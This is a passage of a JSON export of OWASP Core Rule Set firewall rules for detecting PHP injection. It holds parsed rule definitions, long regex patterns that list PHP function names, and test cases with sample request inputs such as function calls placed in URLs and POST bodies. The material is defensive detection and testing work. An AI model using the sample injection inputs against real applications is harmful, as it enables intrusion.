"(?:\\((?:.+\\)(?:[\\\"'][\\-0-9A-Z_a-z]+[\\\"'])?\\(.+|[^\\)]*string[^\\)]*\\)[\\s\\x0b\\\"'\\-\\.0-9A-\\[\\]_a-\\{\\}]+\\([^\\)]*)|(?:\\[[0-9]+\\]|\\{[0-9]+\\}|\\$[^\\(\\),\\./;\\x5c]+|[\\\"'][\\-0-9A-Z\\x5c_a-z]+[\\\"'])\\(.+)\\);", "actions": [ { "act_name": "id", "lineno": 534, "act_quote": "no_quote", "act_arg": "933210", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 535, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 536, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 537, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 538, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 538, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 538, "act_quote": "no_quote", "act_arg": "replaceComments", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 538, "act_quote": "no_quote", "act_arg": "removeWhitespace", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 539, "act_quote": "quotes", "act_arg": "PHP Injection Attack: Variable Function Call Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 540, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 541, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 542, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 543, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 544, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 545, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 546, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 547, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 548, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 549, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 550, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 551, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 552, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 533 } }, { "rule_id": "933013", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 554, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 554, "act_quote": "no_quote", "act_arg": "933013", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 554, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 554, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 554, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 554, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 554, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 554, "act_quote": "no_quote", "act_arg": "END-REQUEST-933-APPLICATION-ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 554 } }, { "rule_id": "933014", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 555, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 555, "act_quote": "no_quote", "act_arg": "933014", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 555, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 555, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 555, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 555, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 555, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 555, "act_quote": "no_quote", "act_arg": "END-REQUEST-933-APPLICATION-ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 555 } }, { "rule_id": "933151", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:a(?:c(?:cel_chdir|osh?)|ddc?slashes|pache_(?:child_terminate|get(?:_(?:modules|version)|env)|lookup_uri|note |re(?:quest|sponse)_headers|setenv)|r(?:ray_(?:c(?:h(?:ange_key_case|unk)|o(?:lumn|mbine|unt_values))|diff(?:_(?:assoc|key|u(?:assoc|key)))?|f(?:ill(?:_keys)?|lip)|i(?:ntersect(?:_(?:assoc|key|u(?:assoc|key)))?|s_list)|key(?:_(?:fir|la)st|s)|m(?:ap|erge(?:_recursive)?|ultisort)|p(?:ad|op|roduct)|r(?:and|e(?:(?:duc|vers)e|place(?:_recursive)?))|s(?:earch|p?lice|um)|u(?:(?:diff|intersect)(?:_u?assoc)?|n(?:ique|shift))|walk(?:_recursive)?)|sort)|s(?:inh|ort|sert_options)|tan[2h]?)|b(?:ase(?:64_(?:de|en)code|_convert)|c(?:add|comp|div|m(?:od|ul)|pow(?:mod)?|s(?:cale|qrt|ub))|in(?:2hex|d(?:_textdomain_codeset|ec|textdomain))|oolval|z(?:(?:de)?compress|err(?:no|(?:o|st)r)|open|read))|c(?:al(?:_(?:days_in_month|(?:from|to)_jd|info)|l_user_func_array)|eil|h(?:(?:di)?r|grp|mod|own|unk_split)|l(?:ass_(?:alia|(?:implem|par)ent|use)s|earstatcache|ose(?:dir|log))|o(?:llator_(?:asort|c(?:ompar|reat)e|get_(?:(?:attribut|error_(?:cod|messag)|local)e|s(?:ort_key|trength))|s(?:et_(?:attribute|strength)|ort(?:_with_sort_keys)?))|m_(?:create_guid|event_sink|get_active_object|load_typelib|message_pump|print_typeinfo)|n(?:fig_get_hash|nection_(?:aborted|status)|vert_uu(?:de|en)code)|unt_chars)|rc32|type_(?:al(?:num|pha)|cntrl|(?:x?digi|p(?:rin|unc))t|graph|(?:low|upp)er|space)|url_(?:(?:c(?:los|opy_handl)|file_creat|paus)e|e(?:rr(?:no|or)|scape|xec)|getinfo|(?:ini|rese)t|multi_(?:(?:(?:add|remove)_handl|clos)e|e(?:rrno|xec)|getcontent|in(?:fo_read|it)|s(?:e(?:lec|top)t|trerror))|s(?:etopt(?:_array)?|hare_(?:close|errno|init|s(?:etopt|trerror))|trerror)|u(?:nescape|pkeep)|version))|d(?:ate(?:_(?:add|create(?:_(?:from_format|immutable(?:_from_format)?))?|d(?:(?:ate_s|efault_timezone_[gs])et|iff)|(?:forma|(?:offset_g|time(?:_s|(?:stamp|zone)_[gs]))e)t|get_last_errors|i(?:nterval_(?:create_from_date_string|format)|sodate_set)|modify|parse(?:_from_format)?|su(?:b|n(?:_info|rise|set)))|fmt_(?:(?:creat|localtim|pars)e|format(?:_object)?|get_(?:calendar(?:_object)?|(?:datetyp|error_(?:cod|messag)|local)e|pattern|time(?:type|zone(?:_id)?))|is_lenient|set_(?:calendar|lenient|pattern|timezone)))|ba_(?:(?:clos|delet|replac)e|(?:exist|handler)s|f(?:etch|irstkey)|(?:inser|key_spli|lis)t|nextkey|op(?:en|timize)|popen|sync)|(?:cn?)?gettext|e(?:bug_(?:(?:print_)?backtrace|zval_dump)|c(?:bin|hex)|flate_(?:add|init)|g2rad)|isk_(?:free|total)_space|l_test_test[12]|n(?:gettext|s_(?:check_record|get_(?:mx|record)))|om_import_simplexml)|e(?:aster_da(?:te|ys)|n(?:chant_(?:broker_(?:d(?:escribe|ict_exists)|free(?:_dict)?|get_(?:dict_path|error)|(?:ini|request_(?:pwl_)?dic)t|list_dicts|set_(?:dict_path|ordering))|dict_(?:add(?:_to_session)?|(?:quick_)?check|describe|get_error|is_added|s(?:tore_replacemen|ugges)t))|um_exists)|rror_(?:(?:clear|get)_last|(?:lo|reportin)g)|scapeshell(?:arg|cmd)|x(?:if_(?:imagetype|read_data|t(?:agname|humbnail))|pm1|tension_loaded))|f(?:astcgi_finish_request|d(?:atasync|iv)|eof|f(?:i_trampoline|lush)|get(?:c(?:sv)?|s)|i(?:l(?:e_put_contents|ter_(?:has_var|i(?:d|nput(?:_array)?)|list|var(?:_array)?))|nfo_(?:buffer|(?:clos|fil)e|open|set_flags))|loatval|(?:mo|re(?:a|nchtoj))d|nmatch|orward_static_call(?:_array)?|p(?:assthru|m_get_status|rintf|utcsv)|s(?:canf|eek|ockopen|tat|ync)|t(?:ell|ok|p_(?:a(?:lloc|ppend)|c(?:dup|h(?:dir|mod)|lose|onnect)|delete|exec|f(?:ge|pu)t|get(?:_option)?|login|m(?:dtm|kdir|lsd)|n(?:b_(?:continue|(?:f(?:ge|pu)|ge|pu)t)|list)|p(?:asv|ut|wd)|r(?:aw(?:list)?|ename|mdir)|s(?:et_option|(?:i[tz]|ystyp)e|sl_connect))|runcate)|unc_(?:get_args?|num_args)|write)|g(?:c_(?:(?:(?:collect_cycl|mem_cach)e|statu)s|disable|enabled?)|d_info|et(?:_(?:browser|c(?:(?:alled_clas|lass_(?:method|var))s|(?:fg_va|urrent_use)r)|de(?:bug_type|(?:clared_(?:(?:class|interfac)e|trait)|fined_(?:constant|function|var))s)|(?:extension_func|loaded_extension|m(?:angled_object_var|eta_tag)|parent_clas)s|h(?:eaders|tml_translation_table)|include(?:_path|d_files)|o(?:bject_vars|pen_basedir)|resource(?:_(?:id|type)|s))|(?:cw|lastmo)d|(?:dat|rusag)e|env|host(?:by(?:addr|namel?)|name)|imagesize(?:fromstring)?|my(?:[gpu]id|inode)|opt|protobyn(?:ame|umber)|servby(?:name|port)|t(?:ext|imeofday|ype))|m(?:(?:dat|(?:mk|strf)tim)e|p_(?:a(?:bs|[dn]d)|binomial|c(?:lrbit|mp|om)|div(?:_(?:qr?|r)|exact)|(?:expor|fac|hamdis|testbi)t|gcd(?:ext)?|i(?:mport|n(?:(?:i|ver)t|tval))|jacobi|(?:kronecke|x?o)r|l(?:cm|egendre)|m(?:od|ul)|ne(?:g|xtprime)|p(?:erfect_(?:power|square)|o(?:pcount|wm?)|rob_prime)|r(?:andom_(?:bits|range|seed)|oot(?:rem)?)|s(?:can[01]|etbit|ign|qrt(?:rem)?|trval|ub)))|r(?:apheme_(?:extract|s(?:tr(?:i(?:pos|str)|len|(?:ri?)?pos|str)|ubstr))|egoriantojd)|z(?:(?:un)?compress|(?:de(?:cod|flat)|encod|fil|inflat)e|open))|h(?:ash_(?:(?:algo|equal)s|copy|fi(?:le|nal)|h(?:kdf|mac(?:_(?:algos|file))?)|init|pbkdf2|update(?:_(?:file|stream))?)|e(?:ader(?:_re(?:gister_callback|move)|s_(?:lis|sen)t)|brev|x(?:2bin|dec))|ighlight_(?:file|string)|rtime|t(?:ml(?:(?:_entity|specialchars)_decode|entities)|tp_(?:build_query|response_code))|ypot)|i(?:conv(?:_(?:get_encoding|mime_(?:decode(?:_headers)?|encode)|s(?:et_encoding|tr(?:len|r?pos)|ubstr)))?|dn_to_(?:ascii|utf8)|gnore_user_abort|ma(?:ge(?:_type_to_(?:extension|mime_type)|a(?:ffine(?:matrix(?:conca|ge)t)?|lphablending|ntialias|rc|vif)|(?:bm|w(?:bm|eb))p|c(?:har(?:up)?|o(?:lor(?:a(?:llocate(?:alpha)?|t)|closest(?:alpha|hwb)?|deallocate|(?:exact|resolve)(?:alpha)?|match|s(?:et|forindex|total)|transparent)|nvolution|py(?:merge(?:gray)?|res(?:ampl|iz)ed)?)|r(?:eate(?:from(?:avif|(?:bm|w(?:bm|eb))p|g(?:d(?:2(?:part)?)?|if)|(?:jpe|(?:p|stri)n)g|tga|x[bp]m)|truecolor)?|op(?:auto)?))|d(?:ashedline|estroy)|ellipse|f(?:il(?:l(?:ed(?:arc|(?:ellips|rectangl)e|polygon)|toborder)?|ter)|lip|ont(?:height|width)|t(?:bbox|text))|g(?:ammacorrect|d2?|et(?:clip|interpolation)|if|rab(?:screen|window))|i(?:nterlace|struecolor)|jpeg|l(?:(?:ayereffec|oadfon)t|ine)|openpolygon|p(?:alette(?:copy|totruecolor)|ng|olygon)|r(?:e(?:ctangle|solution)|otate)|s(?:avealpha|cale|et(?:brush|clip|interpolation|pixel|style|t(?:hickness|ile))|tring(?:up)?|[xy])|t(?:ruecolortopalette|ypes)|xbm)|p_(?:(?:8bi|qprin)t|a(?:lerts|ppend)|b(?:ase64|inary|ody(?:struct)?)|c(?:heck|l(?:earflag_full|ose)|reatemailbox)|delete(?:mailbox)?|e(?:rrors|xpunge)|fetch(?:_overview|body|header|(?:mim|structur)e)|g(?:c|et(?:_quota(?:root)?|acl|mailboxes|subscribed))|header(?:info|s)|(?:is_)?open|l(?:ast_error|ist(?:scan)?|sub)|m(?:ail(?:_(?:co(?:mpose|py)|move)|boxmsginfo)?|ime_header_decode|sgno|utf7_to_utf8)|num_(?:msg|recent)|ping|r(?:e(?:namemailbox|open)|fc822_(?:parse_(?:adrlist|headers)|write_address))|s(?:avebody|e(?:arch|t(?:_quota|(?:ac|flag_ful)l))|ort|tatus|ubscribe)|t(?:hread|imeout)|u(?:id|n(?:delet|subscrib)e|tf(?:7_(?:de|en)code|8(?:_to_mutf7)?))))|n(?:_array|et_(?:ntop|pton)|flate_(?:add|get_(?:read_len|status)|init)|i_(?:get(?:_all)?|parse_quantity|restore|set)|t(?:div|erface_exists|l(?:_(?:error_nam|get_error_(?:cod|messag)|is_failur)e|cal_(?:a(?:dd|fter)|(?:befor|f(?:ield_differenc|rom_date_tim)|to_date_tim)e|c(?:lear|reate_instance)|equals|get(?:_(?:a(?:ctual_m(?:ax|in)imum|vailable_locales)|(?:day_of_week_typ|error_(?:cod|messag)|keyword_values_for_local)e|first_day_of_week|greatest_minimum|l(?:east_maximum|ocale)|m(?:aximum|inim(?:al_days_in_first_week|um))|now|(?:(?:repeat|skipp)ed_wall_time_op|weekend_transi)tion|t(?:ime(?:_zone)?|ype)))?|i(?:n_daylight_time|s_(?:equivalent_to|(?:lenien|se)t|weekend))|roll|set(?:_(?:(?:first_day_of|minimal_days_in_first)_week|lenient|(?:repeat|skipp)ed_wall_time_option|time(?:_zone)?))?)|gregcal_(?:(?:create_instanc|[gs]et_gregorian_chang)e|is_leap_year)|tz_(?:c(?:ount_equivalent_ids|reate_(?:default|enumeration|time_zone(?:_id_enumeration)?))|(?:(?:from|to)_date_time_zon|use_daylight_tim)e|get_(?:(?:canonical|windows)_id|d(?:isplay_name|st_savings)|e(?:quivalent_id|rror_(?:cod|messag)e)|(?:gm|offse)t|id(?:_for_windows_id)?|r(?:aw_offset|egion)|(?:tz_data_versio|unknow)n)|has_same_rules))))|p(?:2long|tc(?:embed|parse))|s_(?:bool|(?:(?:(?:c(?:all|ount)|(?:execu|wri)t)ab|uploaded_fi)l|i(?:nfinit|terabl)|re(?:adabl|sourc))e|f(?:i(?:l|nit)e|loat)|link|nan|s(?:calar|oap_fault|tring|ubclass_of))|terator_(?:(?:appl|to_arra)y|count))|j(?:d(?:dayofweek|monthname|to(?:french|gregorian|j(?:ewish|ulian)|unix))|(?:ewish|ulian)tojd|son_(?:last_error(?:_msg)?|validate)))[\\s\\x0b]*\\(", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: Medium-Risk PHP Function Name Found", "logdata": "Matched Data: %{TX.0} found within %{TX.933151_MATCHED_VAR_NAME}: %{TX.933151_MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "pmf + chain", "test_id": 1, "request": { "method": "GET", "uri": "/get/array_diff%20%28", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933151 ] }, "malicious_patterns": [] }, { "description": "pmf + chain", "test_id": 2, "request": { "method": "GET", "uri": "/get?date_ADD%28%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "date_ADD%28%29" } ] }, { "description": "non-dangerous PHP functions, removed to reduce FP", "test_id": 3, "request": { "method": "GET", "uri": "/get?foo=filemtime%28%24foo%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=filemtime%28%24foo%29" } ] }, { "description": "pmf + chain", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "gethostbynamE(" }, "expected": { "should_block": true, "rule_ids": [ 933151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "gethostbynamE(" } ] }, { "description": "No parenthesis after keyword", "test_id": 5, "request": { "method": "GET", "uri": "/get?foo=array_diff", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=array_diff" } ] }, { "description": "rule should not trigger when there are other words before parenthesis (`ceil` should not be matched)", "test_id": 6, "request": { "method": "GET", "uri": "/get?a=ceiling%20height(9ft)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=ceiling%20height(9ft)" } ] }, { "description": "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)", "test_id": 7, "request": { "method": "GET", "uri": "/get?a=preview", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=preview" } ] }, { "description": "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)", "test_id": 8, "request": { "method": "GET", "uri": "/get?a=exploration", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=exploration" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 584, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:a(?:c(?:cel_chdir|osh?)|ddc?slashes|pache_(?:child_terminate|get(?:_(?:modules|version)|env)|lookup_uri|note |re(?:quest|sponse)_headers|setenv)|r(?:ray_(?:c(?:h(?:ange_key_case|unk)|o(?:lumn|mbine|unt_values))|diff(?:_(?:assoc|key|u(?:assoc|key)))?|f(?:ill(?:_keys)?|lip)|i(?:ntersect(?:_(?:assoc|key|u(?:assoc|key)))?|s_list)|key(?:_(?:fir|la)st|s)|m(?:ap|erge(?:_recursive)?|ultisort)|p(?:ad|op|roduct)|r(?:and|e(?:(?:duc|vers)e|place(?:_recursive)?))|s(?:earch|p?lice|um)|u(?:(?:diff|intersect)(?:_u?assoc)?|n(?:ique|shift))|walk(?:_recursive)?)|sort)|s(?:inh|ort|sert_options)|tan[2h]?)|b(?:ase(?:64_(?:de|en)code|_convert)|c(?:add|comp|div|m(?:od|ul)|pow(?:mod)?|s(?:cale|qrt|ub))|in(?:2hex|d(?:_textdomain_codeset|ec|textdomain))|oolval|z(?:(?:de)?compress|err(?:no|(?:o|st)r)|open|read))|c(?:al(?:_(?:days_in_month|(?:from|to)_jd|info)|l_user_func_array)|eil|h(?:(?:di)?r|grp|mod|own|unk_split)|l(?:ass_(?:alia|(?:implem|par)ent|use)s|earstatcache|ose(?:dir|log))|o(?:llator_(?:asort|c(?:ompar|reat)e|get_(?:(?:attribut|error_(?:cod|messag)|local)e|s(?:ort_key|trength))|s(?:et_(?:attribute|strength)|ort(?:_with_sort_keys)?))|m_(?:create_guid|event_sink|get_active_object|load_typelib|message_pump|print_typeinfo)|n(?:fig_get_hash|nection_(?:aborted|status)|vert_uu(?:de|en)code)|unt_chars)|rc32|type_(?:al(?:num|pha)|cntrl|(?:x?digi|p(?:rin|unc))t|graph|(?:low|upp)er|space)|url_(?:(?:c(?:los|opy_handl)|file_creat|paus)e|e(?:rr(?:no|or)|scape|xec)|getinfo|(?:ini|rese)t|multi_(?:(?:(?:add|remove)_handl|clos)e|e(?:rrno|xec)|getcontent|in(?:fo_read|it)|s(?:e(?:lec|top)t|trerror))|s(?:etopt(?:_array)?|hare_(?:close|errno|init|s(?:etopt|trerror))|trerror)|u(?:nescape|pkeep)|version))|d(?:ate(?:_(?:add|create(?:_(?:from_format|immutable(?:_from_format)?))?|d(?:(?:ate_s|efault_timezone_[gs])et|iff)|(?:forma|(?:offset_g|time(?:_s|(?:stamp|zone)_[gs]))e)t|get_last_errors|i(?:nterval_(?:create_from_date_string|format)|sodate_set)|modify|parse(?:_from_format)?|su(?:b|n(?:_info|rise|set)))|fmt_(?:(?:creat|localtim|pars)e|format(?:_object)?|get_(?:calendar(?:_object)?|(?:datetyp|error_(?:cod|messag)|local)e|pattern|time(?:type|zone(?:_id)?))|is_lenient|set_(?:calendar|lenient|pattern|timezone)))|ba_(?:(?:clos|delet|replac)e|(?:exist|handler)s|f(?:etch|irstkey)|(?:inser|key_spli|lis)t|nextkey|op(?:en|timize)|popen|sync)|(?:cn?)?gettext|e(?:bug_(?:(?:print_)?backtrace|zval_dump)|c(?:bin|hex)|flate_(?:add|init)|g2rad)|isk_(?:free|total)_space|l_test_test[12]|n(?:gettext|s_(?:check_record|get_(?:mx|record)))|om_import_simplexml)|e(?:aster_da(?:te|ys)|n(?:chant_(?:broker_(?:d(?:escribe|ict_exists)|free(?:_dict)?|get_(?:dict_path|error)|(?:ini|request_(?:pwl_)?dic)t|list_dicts|set_(?:dict_path|ordering))|dict_(?:add(?:_to_session)?|(?:quick_)?check|describe|get_error|is_added|s(?:tore_replacemen|ugges)t))|um_exists)|rror_(?:(?:clear|get)_last|(?:lo|reportin)g)|scapeshell(?:arg|cmd)|x(?:if_(?:imagetype|read_data|t(?:agname|humbnail))|pm1|tension_loaded))|f(?:astcgi_finish_request|d(?:atasync|iv)|eof|f(?:i_trampoline|lush)|get(?:c(?:sv)?|s)|i(?:l(?:e_put_contents|ter_(?:has_var|i(?:d|nput(?:_array)?)|list|var(?:_array)?))|nfo_(?:buffer|(?:clos|fil)e|open|set_flags))|loatval|(?:mo|re(?:a|nchtoj))d|nmatch|orward_static_call(?:_array)?|p(?:assthru|m_get_status|rintf|utcsv)|s(?:canf|eek|ockopen|tat|ync)|t(?:ell|ok|p_(?:a(?:lloc|ppend)|c(?:dup|h(?:dir|mod)|lose|onnect)|delete|exec|f(?:ge|pu)t|get(?:_option)?|login|m(?:dtm|kdir|lsd)|n(?:b_(?:continue|(?:f(?:ge|pu)|ge|pu)t)|list)|p(?:asv|ut|wd)|r(?:aw(?:list)?|ename|mdir)|s(?:et_option|(?:i[tz]|ystyp)e|sl_connect))|runcate)|unc_(?:get_args?|num_args)|write)|g(?:c_(?:(?:(?:collect_cycl|mem_cach)e|statu)s|disable|enabled?)|d_info|et(?:_(?:browser|c(?:(?:alled_clas|lass_(?:method|var))s|(?:fg_va|urrent_use)r)|de(?:bug_type|(?:clared_(?:(?:class|interfac)e|trait)|fined_(?:constant|function|var))s)|(?:extension_func|loaded_extension|m(?:angled_object_var|eta_tag)|parent_clas)s|h(?:eaders|tml_translation_table)|include(?:_path|d_files)|o(?:bject_vars|pen_basedir)|resource(?:_(?:id|type)|s))|(?:cw|lastmo)d|(?:dat|rusag)e|env|host(?:by(?:addr|namel?)|name)|imagesize(?:fromstring)?|my(?:[gpu]id|inode)|opt|protobyn(?:ame|umber)|servby(?:name|port)|t(?:ext|imeofday|ype))|m(?:(?:dat|(?:mk|strf)tim)e|p_(?:a(?:bs|[dn]d)|binomial|c(?:lrbit|mp|om)|div(?:_(?:qr?|r)|exact)|